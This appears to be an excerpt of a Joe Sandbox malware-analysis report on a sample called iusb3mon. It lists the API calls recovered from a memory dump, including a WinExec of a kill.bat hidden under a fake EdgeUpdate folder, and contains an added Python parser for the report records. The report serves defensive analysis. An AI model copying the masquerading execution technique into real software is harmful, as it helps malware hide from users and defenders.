• Sleep.KERNEL32(000493E0), ref: 06245D8C
• WinExec.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,00000000), ref: 06245DA2
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Exec$AttributesCloseCreateHandleSleepWrite
                                                                                                                    • String ID: C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat
                                                                                                                    • API String ID: 3627572907-3013772396
                                                                                                                    • Opcode ID: f4e597c37ce0826e9bd1ab9e2e35cd2694d4ae674e9967b9a496e4b12c3a878a
                                                                                                                    • Instruction ID: 283da7dfd1198277145da856f24f0b181d566ed82b25f550d91aaa86aae3e9c6
                                                                                                                    • Opcode Fuzzy Hash: f4e597c37ce0826e9bd1ab9e2e35cd2694d4ae674e9967b9a496e4b12c3a878a
                                                                                                                    • Instruction Fuzzy Hash: 55E04F20521B6876E0E57321AC89F9F354D8F83B44F060020FE64362D186992B5585FF
                                                                                                                    APIs
                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 0625B82D
                                                                                                                    • GetClassNameA.USER32(00000000,?,0000000A), ref: 0625B848
                                                                                                                    • lstrcmpiA.KERNEL32(?,combobox), ref: 0625B857
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassLongNameWindowlstrcmpi
                                                                                                                    • String ID: combobox
                                                                                                                    • API String ID: 2054663530-2240613097
                                                                                                                    • Opcode ID: 32ec0fb76aa5d824f43d66b8d6127562402fb60607c429d2b71cf52262ceed7f
                                                                                                                    • Instruction ID: 2a69b3c8cf11549354905f7fbe0a026dd5d9949ab0c8b67b558a72ac3d6ad412
                                                                                                                    • Opcode Fuzzy Hash: 32ec0fb76aa5d824f43d66b8d6127562402fb60607c429d2b71cf52262ceed7f
                                                                                                                    • Instruction Fuzzy Hash: 7CE06D31A6430ABBCF619F70DC4EAA93B68AB10386F118520FD56E5090D770D255CA92
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 062491B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
                                                                                                                      • Part of subcall function 062491B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,06247971,?,00000032,?,?,?,00000004), ref: 06247383
                                                                                                                    • gethostname.WS2_32(?,?), ref: 06247392
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeLoadgethostnamelstrlen
                                                                                                                    • String ID: Console$Remarkbeizhu
                                                                                                                    • API String ID: 4010645601-3228434003
                                                                                                                    • Opcode ID: b1503772986f8e874ab057f273ec84366a88b191f7bae086b25b54faa3fa615e
                                                                                                                    • Instruction ID: e7a8b27c77915214be177003ef8b99f39644a46d7ae6730461e7478f6d3f0678
                                                                                                                    • Opcode Fuzzy Hash: b1503772986f8e874ab057f273ec84366a88b191f7bae086b25b54faa3fa615e
                                                                                                                    • Instruction Fuzzy Hash: 58E08631666311BAD6913B616C4AFCF3F6AAF49710F104445FF5974080D7B291D18B9B
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,062499FE), ref: 0624C06E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0624C07E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                    • API String ID: 1646373207-3105848591
                                                                                                                    • Opcode ID: b4f667161f4ae1e475063c5d52ca67913c1fad2b2bcbbfb99fba42a3f9f2feb6
                                                                                                                    • Instruction ID: 1e9694a6c18fc33f13dcd340d447265ce7a7e78a1a145dffb0ac5ac5859b73a3
                                                                                                                    • Opcode Fuzzy Hash: b4f667161f4ae1e475063c5d52ca67913c1fad2b2bcbbfb99fba42a3f9f2feb6
                                                                                                                    • Instruction Fuzzy Hash: 6EC012A07663036AFAB43A751C4DF15210C0B00942F061254AE45D4484CAB0C200C931
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 80d84ea4fd771fae966261ec32ea088f8ce8d9d317b564af7483c7e8f42b99dc
                                                                                                                    • Instruction ID: 4046f3972422765c80b111c19c92365b916f9735e4ce2ada105e2ca5e3cfd447
                                                                                                                    • Opcode Fuzzy Hash: 80d84ea4fd771fae966261ec32ea088f8ce8d9d317b564af7483c7e8f42b99dc
                                                                                                                    • Instruction Fuzzy Hash: E2910871D21215AEEFA9FB68DC84A9E7BB9EB49762F140211FC25B6580E731CD40CB60
                                                                                                                    APIs
                                                                                                                    • HeapAlloc.KERNEL32(00000000,00002020,?,?,?,06248D56,0624FE5C,00000000,00000010,00000000,00000009,00000009,?,0624AD87,00000010,00000000), ref: 0624F9B1
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,06248D56,0624FE5C,00000000,00000010,00000000,00000009,00000009,?,0624AD87,00000010,00000000), ref: 0624F9D5
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,06248D56,0624FE5C,00000000,00000010,00000000,00000009,00000009,?,0624AD87,00000010,00000000), ref: 0624F9EF
                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,06248D56,0624FE5C,00000000,00000010,00000000,00000009,00000009,?,0624AD87,00000010,00000000,06248D56), ref: 0624FAB0
                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,06248D56,0624FE5C,00000000,00000010,00000000,00000009,00000009,?,0624AD87,00000010,00000000,06248D56,00000000), ref: 0624FAC7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual$FreeHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 714016831-0
                                                                                                                    • Opcode ID: a6a3cac408ab72f22ad241a376146144dabb66191d0a10de3f824323f2204755
                                                                                                                    • Instruction ID: 76bb1220372dd3d9cbf11f1a489cbc2475b22cfe20e437285c15dc11ff5086f2
                                                                                                                    • Opcode Fuzzy Hash: a6a3cac408ab72f22ad241a376146144dabb66191d0a10de3f824323f2204755
                                                                                                                    • Instruction Fuzzy Hash: 1A312471A207129FD7749F24FE88B21B7E2EBC0750F10813AFA5597284E770A445CF56
                                                                                                                    APIs
                                                                                                                    • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 06251A64
                                                                                                                    • GetLastError.KERNEL32 ref: 06251A6E
                                                                                                                    • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 06251B34
                                                                                                                    • GetLastError.KERNEL32 ref: 06251B3E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1948546556-0
                                                                                                                    • Opcode ID: 7ec37d35aa39921f25085444b67e011a928c9d9bc30cd5c601c8bcddfd2650ee
                                                                                                                    • Instruction ID: e678b70b1ba60d1f8389334d921195719dc31abdd073a2d56a1280cd94e14f92
                                                                                                                    • Opcode Fuzzy Hash: 7ec37d35aa39921f25085444b67e011a928c9d9bc30cd5c601c8bcddfd2650ee
                                                                                                                    • Instruction Fuzzy Hash: C1512B30A24346DFDFB19F58C888BA97BF0BF02304F168599EC618B355E3749565CB52
                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,00000824,?), ref: 062516ED
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: 7fd364dd2f6546ce06b105111a02423605d00d6d7761a51a2dbc1d0f36916d4d
                                                                                                                    • Instruction ID: 52d256940b1807693a91ae0bf9bf8f00b4e553ef1ff2b55ee904f60a50283edd
                                                                                                                    • Opcode Fuzzy Hash: 7fd364dd2f6546ce06b105111a02423605d00d6d7761a51a2dbc1d0f36916d4d
                                                                                                                    • Instruction Fuzzy Hash: 61518D31A20209EFDBA1CF68C888BAD7BB5FF45340F168595EC259F250D7709A50CBA0
                                                                                                                    APIs
                                                                                                                    • InterlockedIncrement.KERNEL32(0627893C), ref: 06256B52
                                                                                                                    • InterlockedDecrement.KERNEL32(0627893C), ref: 06256B61
                                                                                                                    • InterlockedDecrement.KERNEL32(0627893C), ref: 06256B94
                                                                                                                    • InterlockedDecrement.KERNEL32(0627893C), ref: 06256C2C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$Decrement$Increment
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2574743344-0
                                                                                                                    • Opcode ID: 20277e1075370cb1c82eabb033dc5af6b0dd24764bf71d744d91add9eaf778f7
                                                                                                                    • Instruction ID: 57df7aad2c4fe724022be3904ab0a3bc1b0ebd170c55a7542dcbea05375f6435
                                                                                                                    • Opcode Fuzzy Hash: 20277e1075370cb1c82eabb033dc5af6b0dd24764bf71d744d91add9eaf778f7
                                                                                                                    • Instruction Fuzzy Hash: 2D313531A34316BFFFB26B60DC4CBAA7FA6EB02721F550059FD04662E1CA744981C790
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0625C0EA: GetParent.USER32(?), ref: 0625C11D
                                                                                                                      • Part of subcall function 0625C0EA: GetLastActivePopup.USER32(?), ref: 0625C12C
                                                                                                                      • Part of subcall function 0625C0EA: IsWindowEnabled.USER32(?), ref: 0625C141
                                                                                                                      • Part of subcall function 0625C0EA: EnableWindow.USER32(?,00000000), ref: 0625C154
                                                                                                                    • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0625BFA8
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0625C016
                                                                                                                    • MessageBoxA.USER32(00000000,?,?,00000000), ref: 0625C024
                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0625C040
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1958756768-0
                                                                                                                    • Opcode ID: d095f0818905441068fde4b026159afee5b7e99ac38c69fd27b76d55c86eeace
                                                                                                                    • Instruction ID: 06c154a57a0782abe69649b0c926acc6bcc7ac59add9d80de5120f19ce3c1e0b
                                                                                                                    • Opcode Fuzzy Hash: d095f0818905441068fde4b026159afee5b7e99ac38c69fd27b76d55c86eeace
                                                                                                                    • Instruction Fuzzy Hash: 7A219176E2020AAFDB708F95CCD5AEDB7B9EB04351F160429FE50E2240D7719A40CF60
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(0624EA70,00000001,00000000,?,?,?,?,?,?,0624EA70,?,0000000C), ref: 06253414
                                                                                                                    • MultiByteToWideChar.KERNEL32(0624EA70,00000009,0000000C,?,00000000,00000000,?,?,?,0624EA70,?,0000000C), ref: 06253427
                                                                                                                    • MultiByteToWideChar.KERNEL32(0624EA70,00000001,0000000C,?,?,00000000,?,?,?,0624EA70,?,0000000C), ref: 06253473
                                                                                                                    • CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,?,?,0624EA70,?,0000000C), ref: 0625348B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$CompareString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 376665442-0
                                                                                                                    • Opcode ID: 111746dd7e6f6fd18c55a42edca8399b194aebf331b8e64007edfd8d4b2cc94f
                                                                                                                    • Instruction ID: 2e1088548aec3c9257c54f26639beb1a54232f8ea5c276ea0d1a5df05ea032b6
                                                                                                                    • Opcode Fuzzy Hash: 111746dd7e6f6fd18c55a42edca8399b194aebf331b8e64007edfd8d4b2cc94f
                                                                                                                    • Instruction Fuzzy Hash: 99210732D1025AEBCF228F84DC499DEBFB6FB49750F164126FE1562160D3329A61DB90
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(?,00000000,?,?,06247ED1,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 062482BA
                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,06247ED1,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 062482DE
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,06247ED1,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 062482E6
                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 062482ED
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$Heap$LibraryProcessVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 548792435-0
                                                                                                                    • Opcode ID: 014fca4a8a184fdb8a735e1a1a320d8414789a13bf43310eab3db6aa9b5c72f2
                                                                                                                    • Instruction ID: 91232fa57b53791ed81f3f861b541d034ea5d638c65a0b0b5aac8d907ce343be
                                                                                                                    • Opcode Fuzzy Hash: 014fca4a8a184fdb8a735e1a1a320d8414789a13bf43310eab3db6aa9b5c72f2
                                                                                                                    • Instruction Fuzzy Hash: C9012172910B429FD774EFA8DCC882B77E9FB44221305892DF6A693950CB34E941CF50
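The records in this section list only what Joe Sandbox resolved per function; to pivot across many of them (for example, to find every function that releases a module and its memory with FreeLibrary, VirtualFree and HeapFree, as the record directly above does) it helps to parse them into structured form. The Python below is an added example written for this page, not Joe Sandbox code or output. Its input is an abridged, constructed copy of two records from this section (the Associated dump lines and most hash fields are left out), and the regular expressions assume exactly the line layout shown here: a bullet, `Name.MODULE(args), ref: address`, optionally prefixed with `Part of subcall function ADDR:`.

```python
"""Parse the per-function records Joe Sandbox prints in this section
('APIs' list, 'Memory Dump Source', 'Similarity' fields) into dicts.
Added example for this page; it is not Joe Sandbox code."""
import re
from collections import Counter

# A direct call:        • Name.MODULE(args), ref: ADDR
# A call from a callee: • Part of subcall function ADDR: Name.MODULE(args), ref: ADDR
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# Any other bulleted 'Key: value' line (Source File, API ID, Opcode ID, ...).
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

# Constructed input: abridged copy of two records from this page.
SAMPLE = """\
APIs
  • Part of subcall function 0625C0EA: GetParent.USER32(?), ref: 0625C11D
  • Part of subcall function 0625C0EA: GetLastActivePopup.USER32(?), ref: 0625C12C
  • Part of subcall function 0625C0EA: IsWindowEnabled.USER32(?), ref: 0625C141
  • Part of subcall function 0625C0EA: EnableWindow.USER32(?,00000000), ref: 0625C154
• SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0625BFA8
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0625C016
• MessageBoxA.USER32(00000000,?,?,00000000), ref: 0625C024
• EnableWindow.USER32(00000000,00000001), ref: 0625C040
Similarity
• API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
• String ID:
• API String ID: 1958756768-0
APIs
• FreeLibrary.KERNEL32(?,00000000,?,?,06247ED1,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 062482BA
• VirtualFree.KERNEL32(?,00000000,00008000,?,?,06247ED1,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 062482DE
• GetProcessHeap.KERNEL32(00000000,?,?,?,06247ED1,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 062482E6
• HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 062482ED
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Similarity
• API ID: Free$Heap$LibraryProcessVirtual
• String ID:
• API String ID: 548792435-0
• Instruction Fuzzy Hash: C9012172910B429FD774EFA8DCC882B77E9FB44221305892DF6A693950CB34E941CF50
"""


def parse_records(text):
    """Split report text into records (one per 'APIs' header) and parse each."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "fields": {}}
            records.append(cur)
        elif cur is not None and (m := API_RE.match(line)):
            cur["apis"].append({
                "name": m["name"],
                "module": m["module"],
                "args": [a for a in m["args"].split(",") if a],
                "ref": int(m["ref"], 16),
                # address of the intermediate function for 'Part of subcall' lines
                "subcall_of": int(m["sub"], 16) if m["sub"] else None,
            })
        elif cur is not None and (f := FIELD_RE.match(line)):
            # hashes and IDs are kept verbatim; their derivation is Joe Sandbox's
            cur["fields"][f["key"].strip()] = f["val"].strip()
        # bare headers ('Memory Dump Source', 'Similarity') carry no data
    return records


def direct_call_sequence(record):
    """Calls made by the function itself (subcalls excluded), in address order."""
    direct = (a for a in record["apis"] if a["subcall_of"] is None)
    return [f"{a['name']}.{a['module']}" for a in sorted(direct, key=lambda a: a["ref"])]


def has_ordered_calls(record, names):
    """True if `names` appear as an ordered subsequence of the direct calls,
    e.g. FreeLibrary -> VirtualFree -> HeapFree for a module teardown."""
    seq = iter(n.split(".")[0] for n in direct_call_sequence(record))
    return all(any(n == s for s in seq) for n in names)


def module_histogram(records):
    """How many resolved calls each DLL accounts for across all records."""
    counts = Counter()
    for r in records:
        counts.update(a["module"] for a in r["apis"])
    return counts


RECORDS = parse_records(SAMPLE)

if __name__ == "__main__":
    for r in RECORDS:
        print(r["fields"].get("API String ID"), "->", " -> ".join(direct_call_sequence(r)))
    print(module_histogram(RECORDS))
```

In the second record the third argument of VirtualFree is 00008000, which is MEM_RELEASE, so the call releases a whole reserved region rather than decommitting pages; that, together with the FreeLibrary and HeapFree that bracket it, is what an analyst would look for when tracing how the dynamically created PE noted in the summary is cleaned up. Subcall lines are kept but excluded from `direct_call_sequence`, since they describe a callee's behaviour rather than the function the record is about.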
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,?), ref: 0625A75B
                                                                                                                    • GetTopWindow.USER32(00000000), ref: 0625A76E
                                                                                                                    • GetTopWindow.USER32(?), ref: 0625A79E
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0625A7B9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
